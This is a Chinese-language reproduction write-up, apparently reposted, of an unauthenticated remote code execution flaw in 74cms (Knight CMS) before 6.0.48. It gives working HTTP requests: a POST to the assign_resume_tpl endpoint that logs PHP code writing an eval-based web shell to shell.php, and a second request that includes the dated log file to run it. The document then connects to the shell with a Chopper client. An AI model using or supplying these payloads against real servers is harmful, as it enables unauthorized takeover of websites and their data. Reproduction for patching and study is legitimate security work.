騎士CMS文件包含+getshell


騎士CMS文件包含+getshell漏洞復現

0x00簡單介紹

       騎士cms人才系統,是一項基於php+mysql為核心的開源人才網站系統。

0x01漏洞概述

  騎士cms官方發布安全更新,修復了一處遠程代碼執行漏洞。由於騎士cms某些函數過濾不嚴謹,攻擊者通過構造惡意請求可以在無需登錄情況下執行代碼控制服務器。

0x02影響版本

  騎士cms <6.0.48

0x03環境搭建

  這里復現使用的是6.0.20(騎士cms不支持php7.0),下載完成后訪問安裝即可

 

0x04漏洞復現

  1、注入模板

發送poc:
        http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl
        POST:
        variable=1&tpl=<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企業id="$_GET['id']"/>

 

 

 

 

根據報錯查看日志:

       路徑為WWW\74cms\upload\data\Runtime\Logs\Home

 

 

   2、文件包含

發送poc:
        http://127.0.0.1/74cms/upload/index.php?m=home&a=assign_resume_tpl
        POST:
        variable=1&tpl=data/Runtime/Logs/Home/20_12_15.log(日志文件名為日期)

成功寫下shell

 

 

菜刀鏈接

 

 

0x05參考鏈接

https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg

https://blog.csdn.net/weixin_44508748/article/details/111187529


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM